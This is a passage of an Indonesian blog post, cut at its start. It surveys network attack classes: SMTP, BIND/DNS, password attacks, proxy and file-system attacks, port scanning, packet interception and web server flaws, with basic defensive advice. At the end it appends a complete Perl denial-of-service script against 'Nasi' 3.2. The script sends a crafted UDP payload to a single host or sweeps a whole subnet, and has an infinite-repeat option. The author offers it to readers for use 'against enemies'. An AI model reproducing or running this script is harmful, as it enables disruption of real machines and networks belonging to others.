an/pemetaan e-mail diseluruh internet: Simple Mail Tranport Protocol (SMTP). Seorang attacker
dapat mengakibatkan kondisi kesalahan sementara (temporary error) di target system dengan cara mengoverload
lebih banyak data pada SMTP buffer sehingga SMTP buffer tidak bisa menanganinya, kejadian
ini dapat mengakibatkan seorang attacker terlempar dari sendmail program dan masuk kedalam shell
dengan kekuasaan adminitsrasi bahkan dapat mengambil alih root. Beberapa serangan exploitasi juga
sering terjadi pada POP dan IMAP.
Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan
tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood.
Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang
attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong
lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu
organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan
sumber dan alamat dari organisasi tersebut.
Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan
dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat
broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail
dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan
disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai
Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke
users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap
attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.
Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara
melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat
admin agar users mengirimkan passwordnya untuk mengupgrade system.

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain
(BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis
yang diarahkan pada operasi dasar dari Internet (basic internet operation).
Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND
merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa
kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya
beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap
system dan melakukan perintah dengan hak penuh (command execution priviledge).
Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang
berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet
Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak
ada hal mudah lainnya yang menyangkut internet.
Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address
translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat
informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking.
Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari
jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning,
yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain
dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi.
Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil
dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).
DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang
dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya
menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive
name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area,
maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.
Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya
kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk
memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi
telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan
compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini
stidaknya membuat cracker akan sulit menggunakan exploit.
Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang
harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan
patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara
berkala, tentunya untuk menjaga kemanan system.
Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode
mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka
file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin.
Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti
server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache
poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain
hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network
infrastucture sebelum mengganti server yang lama.

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak
perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi
online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP.
Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin
saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka
sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang
dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih
karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat
meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai
hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak
(guessing), brute force, cracking dan sniffing.
Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara
manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang
umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang
aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7
karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat
mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit
angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi
mudah andai saja mereka lupa untuk merubah password default dari sebuah software.
Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan
waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login
dengan menebak password berkali-kali.
Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi
serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker
menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password
umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat
penemuan password sebelum network admin menyadari adanya serangan.
Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada
dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh
lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan
mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak
tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan
password).
Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang
system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk
network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang
salah berulangkali dan akhirnya mengunci account admin ?. Ketika sang admin sedang berusaha untuk
mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system.
Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di
dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah
kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-force
dictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi
dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah
dengan memonitor kewenangan akses pada file.
Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat
mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang
dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut
tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada
HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau
juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan
proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai
kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem
saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk
memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bisa
menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika
attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan
DDOS(distributed denial of service) secara anoymous untuk menyerang network lain.
Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan
mengakibatkan kerawanan yang sama dengan proxy server.

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource
sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota
network kekuasaan akses yang sama di satu dan lain system (dalam network).
Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan
pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi
perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack
Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel)
yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network
dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk
mendapatkan akses ke direktori file.
Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang
network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau
banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan
dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX,
informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data
ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.
Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya
memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049
seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix)
seharusnya di catat dalam log.

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program
penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada
system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini
mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan
membuka backdoor.
Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program
seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat
menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware
dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai
berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan
mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut
sandboxes.

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai
macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi.
Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk
publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception
TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan
informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force,
serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet
milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut
saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali
algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bisa
digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya
memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP
Spoofing.
Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file
yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan.
Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di
system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik
yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya
dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak
dikembalikan.
Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi
bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker
mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System
sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd
bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan
untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat
overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan
string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker
akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke
server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa
dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk
mendeface website.
Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion.
Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang
tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan
perintah secara remote (remote command priviledges).
Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies
antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll.
Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti
nomor credit card dan password.
Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan
cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to
live).
Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada
kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website.
Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection
system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan
untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi
sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek
security pada system sendiri dan metode lain.
Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall
firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari
serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...

DDos NetWorking [LAN]

#!/usr/bin/perl

use IO::Socket;

if (@ARGV < 1)
{
print “\n”;
print ” \/[DoS for All Nassi <= 3.2 build 2260]===[v0.1]=====\\\n”;
print ” \| ___ ___ ___ ___ ___ \|\n”;
print ” \| N /s/ T N /s/ T N /s/ T N /s/ T N /s/ T \|\n”;
print ” \| — — — — — \|\n”;
print ” \| \|\n”;
print ” \| Tested on: Nasi 3.2 build 2260 www.gracebyte.com \|\n”;
print ” \| \|\n”;
print ” \| Usage: nasidos.pl [port] [-i] \|\n”;
print ” \| \|\n”;
print ” \| Example: nasidos.pl 127.0.0.1 \|\n”;
print ” \| nasidos.pl 127.0.0.1 12345 \|\n”;
print ” \| nasidos.pl 192.168.102.* \|\n”;
print ” \| nasidos.pl 192.168.102.1 -i \|\n”;
print ” \| \|\n”;
print ” \| Keys: -i - Infinite DoS. Use ctrl+c for stop it. \|\n”;
print ” \| * - All in subnet. \|\n”;
print ” \| \|\n”;
print ” \| Info: If still don’t work try to scan victem on \|\n”;
print ” \| open UDP ports. Maby use not default port \|\n”;
print ” \| for Nasi. \|\n”;
print ” \\================================================ ==\/\n”;
exit(0);
}

$flag = 0; # Default flag for symple DoS

$ip = $ARGV[0];

if ($ARGV[1] =~ /[0-9]/)
{
$port = $ARGV[1];
print “\n[*] - We use $ARGV[1] UDP port for Nasi \n”;
}
else
{
$port = 50138;
print “\n[*] - We use 50138 (default) UDP port for Nasi \n”;
}

if ($ARGV[2] =~ /^\-i/ || $ARGV[1] =~ /^\-i/ )
{
print ”[*] - Start infinity DoS to $ARGV[0] on port $port\n”;
}

$i = 0;

do

{

($a,$b,$c,$d) = split(/\./,$ip);

if($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/)
{
$i = $i + 1;
$d = $i;
$flag = 2;

}

if($ip =~ /\*/ && ($ARGV[1] !~ /^\-i/ || $ARGV[2] !~ /^\-i/))
{
$i = $i + 1;
$d = $i;
$flag = 1;

}

if($ip =~ /\*/ && ($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/))
{
$i = $i + 1;
$d = $i;
$flag = 2;
}

print ”[*] - Try connect to ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” on port $port\n”;

$remote = IO::Socket::INET->new( Proto => “udp”,
PeerAddr => $a . “\.” . $b . “\.” . $c . “\.” . $d,
PeerPort => $port) or die “\n [-] - Can’t connect to ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” on port $port \n”;
$remote->autoflush(1);
$insock = “ 0 E O?a }a?? 2? ???? ;K? 3 AB??LL¶?®‡??…?f,s5•??°? S ?e??B?« adcJ?“?s???;” . a x 218;

print $remote “$insock”; # Put magic into port

close $remote;

print ” [+] - DoS on ” . $a . “\.” . $b . “\.” . $c . “\.” . $d . ” complited!!!\n\n”; # Display small info

if ($flag == 1 && $i > 254)
{
$flag=0;
}

if ($i > 254)
{
$i = $d = 0;
}

} until ($flag == 0)




Kalo yang Kurang Memahami..Pelajarin Nih..Tapi jangan DDOS saya yakz..akakakakakkaka..gua DOR balik ntar
akkawkawkawkawkkawaw
cukup hanya sama lawan musuh aja
ok!